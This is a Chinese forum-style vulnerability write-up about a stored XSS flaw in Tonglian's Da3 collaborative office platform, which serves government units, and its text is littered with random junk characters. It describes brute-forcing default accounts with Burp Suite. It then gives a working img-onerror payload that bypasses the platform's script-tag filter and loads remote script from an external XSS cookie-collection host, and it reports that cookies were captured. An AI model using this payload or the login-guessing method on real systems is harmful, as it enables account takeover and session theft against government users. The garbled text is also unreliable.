8 g* ~& W1 A# y: K
9 m: e5 k* t, ~/ }% C 同联Da3协同办公平台后台通用储存型xss漏洞. z" }% E2 E0 ~# f' c/ |" D
9 R' `* ^/ {" |0 Q
2 x$ y3 L$ ~! |* X4 [: z% ^, I 平台简介:
1 W7 S, V% ^! N3 l+ P
7 m0 M' K0 U! M2 g0 W # l$ m# F! |( W% E
( x$ U# I' C) {3 P0 J
5 J& n& Z- G6 M' V
: t: l Q C2 A* N 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
) ^" _; j7 x# p1 j同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
, _, M0 {. ]8 r6 B, V$ f" B+ _
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
4 ] P0 M$ r/ @
) @2 r. g+ ?8 K7 B: X( K , n/ Z& L4 n8 V3 i
0 T4 c1 ~7 E( |/ M' w; A# T
+ R" w# W/ P# B9 { n; p1 o. w7 K) Z
# z& E/ Z9 O) ]/ w* ]; I B% l 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
7 O+ L( `6 }% r3 ^" ^
4 f2 B% [; O; O2 i$ M
4 v$ ]+ L+ w, f3 ^4 H
4 Y) r% D+ ]# ]0 a* M! ]% K( R
2 P" {( D) E; L; `7 x2 |
J+ n) Y) m, w" x# O8 P http://1.1.1.1:7197/cap-aco/#(案例2-): o: R$ N/ f2 q
% v% v' a p5 b1 e* u i
5 Z q) R8 K# g# h R; c
http://www.XXOO.com (案例1-官网网站)
4 E; M* N# z' w
' c) p/ b) I* W7 W- |0 L/ o
2 q$ f2 o. P/ f+ M! ?; p; v 漏洞详情:( J; ~% c. |4 a! l% _% d. k
' z ^, Y" h' F8 E* w
- d5 z; f) j* o \ 案例一、
( ^9 q X* L) f7 ]" ]6 z* Z
, ^: w. x0 Z! x+ E6 ?" t7 S " Z1 c7 |2 I3 |
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
2 R: g$ m8 _" p- \9 {/ ^0 p- Y5 |
' K4 J! Z3 ^) X- r* E % i3 x; L- U) C" |* f' {( j
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
6 V" Y8 Z' U! |& N1 k9 b
# x" g6 F$ o0 C
* B _0 o% S" P8 ^4 A9 D
: Z: x% @; u3 j n7 a$ l. j6 g
1 w8 ]9 Z/ m/ T6 L+ R
( _; [. G4 M+ w% Y0 X
. B+ S* c8 D. E6 s
?$ ~1 Q8 _4 J7 ~$ d
: F& a' n( e0 \. ^3 s
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: - i( q1 M1 @0 ?' c5 p& C) w
2 C$ P7 `8 Z5 \9 w
+ Z/ ?1 R. H. v1 a6 T& U I
& R1 i% g3 C5 G7 h q1 S: f9 G
8 d* S" p1 m4 O) u1 |& G, \3 v2 u 9 C/ J1 q- y% ^- ]8 t, Z
b0 E3 g9 s% v; K
7 y2 Y. S% E. C
- [. p( \. ?* c* t5 i3 { 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
, ^4 T4 n5 y- Q) V+ V
" W% x. }9 O7 n d) k
" E9 J/ _' Q8 @' K
1 E- O% b K9 X' q2 m% `8 F
6 N' A& V; [, w/ p7 B: i2 Z4 ]6 o% J3 s
9 k. D6 U: _+ G- j' T: v9 A! A <img src=x5 f0 [" j. A, A9 ]) Z S+ d
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: 9 W/ r! A( y$ S) B; F5 i
3 @- p7 ^& B o. e
9 N) g @# a; G0 i
# E; c1 f! u0 }& o
$ R3 Y; J0 T1 Q$ h9 ~; Q5 A: p
/ A# m: Q+ g/ U/ B) y 然后发送,接收cookie如图:
, O- `$ p! ?* s; S. a
7 \! q# O& w$ T$ ]2 t/ |# F
" S$ u7 _4 A3 D' Y3 B 8 B+ h- M6 N% F: K
m2 w6 T7 i" z5 o; W: } w0 J- W3 K" n
. g; v# C8 g, z+ O* m! M
+ m$ Z* u( J& }. f, y$ u, n/ _
& |% h; y( A8 v4 U. U; D 8 O- o1 ]+ } x4 T P; R
! T9 \' t, {3 K$ K3 b$ b 7 k+ x( J9 t4 R2 f2 }
. r4 w( C: d/ F4 I* L( I* B
& @9 m& t6 a+ O2 l( B4 }; |3 x
8 e o5 N+ ?3 w$ M
& `" _+ w Q# R! `0 P6 G
4 m6 |% f, K8 }. t
: p: ~ x7 y# R
* q) N D) }4 J8 A
j+ @9 x9 `+ K) V2 q) y: U 2 X& r2 R" J4 F- ^3 b
+ u1 w$ y5 `2 Y
$ \$ p; `7 Z% x; Y9 k, C8 n# G/ h
! W% a9 F2 d9 J4 \! ~0 O
案例2、
# G$ n3 }' N6 ~8 I$ u5 m
7 S1 z `" Z( F& z( d- w
" w% `: }0 a" H4 o 前面步骤都一样,下面看效果图: ! }5 f2 g6 H6 ?4 {
4 a4 [- Q% W' r% ~: Z$ N, t
/ q# p2 i4 p& g( t4 [+ T [
# @' ^9 Q; \. E Z$ N: ]/ ^3 u
+ Z* L7 g8 @/ X; w* ], i! g3 l
) W% v/ D$ r! w4 p; w' b
( I* _8 s* z) B! d7 n
G( b& s7 _% i9 m8 R6 Y8 F$ L2 l
& x' G0 }0 U, T G% E 6 w! F! m8 ]* @& v' a+ q
( r, l9 k9 P2 h( H
* `3 r* C( G% V' A( ]1 @( ]
' v* v _; v3 S
5 W; y( M; l: U2 S
0 j( m: ]9 s& D' W. T8 Y' ?( W& I
/ W6 Y: X$ u8 t# h
3 C: N1 D* b' ]! k+ m- B* b 2 O+ C) s ?' l0 L5 Q
( H9 H" [$ K- U y+ f$ C4 D9 x
' C+ m" ?* L* ~3 S' o4 r
2 V5 Q+ N5 ?' x3 k
7 x' _+ F5 `. H8 Y: c4 A1 a
/ L8 k6 k( T5 `& t
5 O) C& U5 N; `; G4 A6 E H 6 ^# m8 P+ H1 W! c9 I
! ~# f. |5 ~5 I* b) k8 ^/ ^; S j
$ P% C- B* T7 X" N% e ) ]) z* B2 W; b
% z$ i& k1 c6 o0 ?- I/ R7 ^1 z